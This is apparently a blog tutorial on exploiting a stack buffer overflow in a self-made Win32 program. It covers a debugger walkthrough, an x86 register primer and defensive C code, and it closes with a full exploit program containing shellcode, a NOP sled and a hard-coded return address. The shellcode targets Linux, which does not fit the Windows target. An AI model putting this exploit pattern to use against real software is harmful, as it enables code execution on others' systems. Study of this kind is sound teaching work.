Thursday, 24 November 2016

Stack buffer overflow exploit

How to write an exploit for a tool: I will try to do it by writing a simple program in C.

Use Code::Blocks to create a console application for Win32.

Open it in Hex Workshop.

Open it in OllyDbg and run it.

Make -> Run

ESP : stack pointer 0022FF8C
EIP : instruction pointer 00401280
EBP : base pointer 0022FF94

Use the application: enter a word and run it, then look at the registers.

ESP : stack pointer 0022FF70
EIP : instruction pointer 00401283
EBP : base pointer 0022FF94

REGISTERS are components of the processor that store data and addresses.

Processor registers
The 32-bit processor architecture provides
- ten 32-bit and six 16-bit registers

Registers are divided into three categories:
- general registers
- control registers
- segment registers

The general registers are divided into:
- data registers
- pointer registers
- index registers

DATA REGISTERS
32-bit registers used for arithmetic, logical and other operations.
- 32-bit registers -> EAX, EBX, ECX, EDX
- the lower half of each is used as a 16-bit register -> AX, BX, CX, DX
- the lower 16 bits split further into 8-bit registers -> AH, AL, BH, BL, CH, CL, DH, DL

AX - (primary accumulator) used in input/output and in most arithmetic instructions.
BX - (base register) used as a base for indexed addressing.
CX - (counter register) used for loops and repeated (iterative) operations.
DX - (data register) used in input/output, multiplication and division.

POINTER REGISTERS
32-bit pointer registers EIP, ESP, EBP and their 16-bit halves IP, SP, BP.

The pointer registers fall into three kinds:

- Instruction Pointer (IP) - the instruction pointer
The 16-bit IP register holds the offset of the next instruction to be executed.
Combined with the CS register (CS:IP) it gives the full address of the current instruction in the code segment.
A segment address with an offset is the start address of the memory segment plus the offset within it.

- Stack Pointer (SP) - the stack pointer
The 16-bit SP register holds the offset of the top of the program stack.
Combined with the SS register (SS:SP) it points to the current position of data and addresses on the program stack.

- Base Pointer (BP) - the base pointer
The 16-bit BP register is mainly used to reference parameters passed to a subroutine.
Combined with SS it addresses the stack; it may also be combined with SI and DI as the base register for special addressing modes.

INDEX REGISTERS - indexed addressing (sometimes also used in arithmetic operations)
32-bit -> ESI, EDI
16-bit -> SI, DI

Source Index (SI) - the source index for string operations
Destination Index (DI) - the destination index for string operations

Enter more characters than the buffer holds: 55 characters.

We see the stack buffer overflow.
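The crash above comes from copying input into a fixed stack buffer with no length check. As an added example (not the blog's target.exe, whose source the page does not show), the following C contrasts that unbounded copy with a length check and a bounded copy that reports truncation; BUF_LEN takes the 88 bytes the exploit's comment reads from the disassembly, and the input strings are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Size of the target's stack buffer; the page reads it as 58h = 88 from the disassembly. */
#define BUF_LEN 88

/* The pattern the tutorial's target exhibits (constructed here for contrast): user input copied
 * into a fixed stack buffer with no length check. Input of BUF_LEN bytes or more runs off the end
 * of the buffer into the saved EBP and return address, which is what OllyDbg showed above. */
static void vulnerable_copy(char *dst, const char *src)
{
    strcpy(dst, src);                       /* unbounded: safe only if the caller checked the length */
}

/* Length check done before any copy: the input fits only if it leaves room for the terminator. */
int input_fits(const char *s, size_t buflen)
{
    return strlen(s) < buflen;
}

/* Hardened copy: never writes more than dstsize bytes, always terminates, and returns 1 when the
 * input had to be cut so the caller can reject it instead of silently using a truncated value. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    int truncated = n >= dstsize;
    size_t copy = truncated ? dstsize - 1 : n;
    memcpy(dst, src, copy);
    dst[copy] = '\0';
    return truncated;
}

/* Runs both paths on constructed inputs: a short word and a 120-byte run of 'A' (longer than the
 * 55 the page typed in). Returns 0 when the checks behave as expected, a nonzero step otherwise. */
int demo(void)
{
    char buf[BUF_LEN];
    char oversized[121];
    const char *word = "hello";

    memset(oversized, 'A', 120);
    oversized[120] = '\0';

    /* short input: passes the check, so even the unbounded copy stays inside the buffer */
    if (!input_fits(word, sizeof buf)) return 1;
    vulnerable_copy(buf, word);
    if (strcmp(buf, word) != 0) return 2;

    /* oversized input: the check rejects it, and the bounded copy reports truncation */
    if (input_fits(oversized, sizeof buf)) return 3;
    if (!copy_bounded(buf, sizeof buf, oversized)) return 4;
    if (strlen(buf) != BUF_LEN - 1) return 5;   /* 87 bytes kept, terminator in the last slot */

    return 0;
}

int main(void)
{
    printf("demo: %s\n", demo() == 0 ? "all checks behaved as expected" : "unexpected result");
    return 0;
}
```

The length check belongs before the copy, and the bounded copy's return value should be treated as a rejection: a silently truncated value is still a logic bug, just no longer a memory-safety one.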

Now try to write the exploit.

//Exploit for target.exe
#include <process.h>   // execlp(): run another program (MinGW/Win32)
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <dos.h>

/* Minimal shellcode (the bytes given on the page: Linux x86 execve("/bin/sh") via int 0x80) */
static char shellcode[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP     0x90
#define LEN     88             // lpBuffer 58h -> decimal 88
#define RET     0x770F6BF4L    // return address from OllyDbg (needs the 0x prefix to compile)

int main(void)
{
    char buffer[LEN + 1];      // +1 for the terminator so the buffer can be passed as a C string
    long retaddr = RET;
    int i;
    // NOP count computed once as a signed value: the original LEN-strlen(shellcode)-100 was
    // negative, wrapped as size_t and made the loop overrun this buffer itself
    int nops = LEN - (int)strlen(shellcode) - 2 * (int)sizeof(long);   // leaves two return addresses at the end

    fprintf(stderr, "using address 0x%lx\n", retaddr);   // fprintf writes formatted output to a stream;
                                                          // stderr prints error messages to the screen

    /* fill the whole buffer with the return address */
    for (i = 0; i < LEN; i += 4)                          // 4 bytes at a time
        *(long *)&buffer[i] = retaddr;

    /* fill the start of the buffer with NOPs, leaving room for the shellcode and the return address */
    for (i = 0; i < nops; i++)
        *(buffer + i) = NOP;

    /* after the NOPs, copy in the execve() shellcode */
    memcpy(buffer + i, shellcode, strlen(shellcode));
    buffer[LEN] = '\0';

    /* hand the buffer to the target and run it (assumes target.exe takes its input as the first
       argument; a target that reads stdin would need the buffer written to its input instead) */
    execlp("target.exe", "target.exe", buffer, (char *)NULL);   // run target.exe
    perror("execlp");                                           // reached only if the exec failed
    return 1;
}
